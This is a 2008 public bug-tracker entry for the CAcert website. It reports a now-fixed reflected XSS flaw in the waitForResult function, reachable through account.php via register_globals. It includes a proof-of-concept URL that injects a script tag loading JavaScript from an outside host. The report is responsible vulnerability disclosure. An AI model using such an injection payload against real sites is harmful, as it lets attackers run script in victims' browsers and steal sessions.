View Issue Details
| ID | Project | Category | View Status | Date Submitted | Last Update |
|---|---|---|---|---|---|
| 0000599 | Main CAcert Website | source code | public | 2008-08-17 12:42 | 2013-01-15 02:52 |
| Reporter | kriss | Assigned To | Sourcerer | ||
| Priority | normal | Severity | major | Reproducibility | always |
| Status | closed | Resolution | fixed | ||
| Fixed in Version | 2008 | ||||
| Summary | 0000599: XSS exploit in general.php/waitForResult | ||||
| Description | waitForResult will echo a passed string verbatim (certid:$table:$certid) when it times out. One place that passes an unencoded var to that function is account.php, oldid == 4. Line 0000266:0000370: waitForResult("emailcerts", $emailid, 4); $emailid can be injected using register_globals as long as the keytype var isn't present in the request. The scope of this is a bit limited since there's about a minute worth of waiting before the page returns. Proof of concept: https://www.cacert.org/account.php?oldid=4&&emailid=%3Cscript%20type=text/javascript%20src=http://people.0x63.nu/~kriss/cacert.js%3E%3C/script%3E | ||||
| Tags | No tags attached. | ||||
| Reviewed by | |||||
| Test Instructions | |||||
| Date Modified | Username | Field | Change |
|---|---|---|---|
| 2008-08-17 12:42 | kriss | New Issue | |
| 2008-08-17 13:25 | Sourcerer | Note Added: 0001144 | |
| 2008-08-17 13:25 | Sourcerer | Status | new => solved? |
| 2008-08-17 13:25 | Sourcerer | Fixed in Version | => production |
| 2008-08-17 13:25 | Sourcerer | Resolution | open => fixed |
| 2008-08-17 13:25 | Sourcerer | Assigned To | => Sourcerer |
| 2008-08-17 13:43 | kriss | Note Added: 0001145 | |
| 2008-08-17 13:43 | kriss | Status | solved? => closed |
| 2010-07-27 15:38 | Sourcerer | View Status | private => public |
| 2013-01-15 02:52 | Werner Dworak | Fixed in Version | => 2008 |
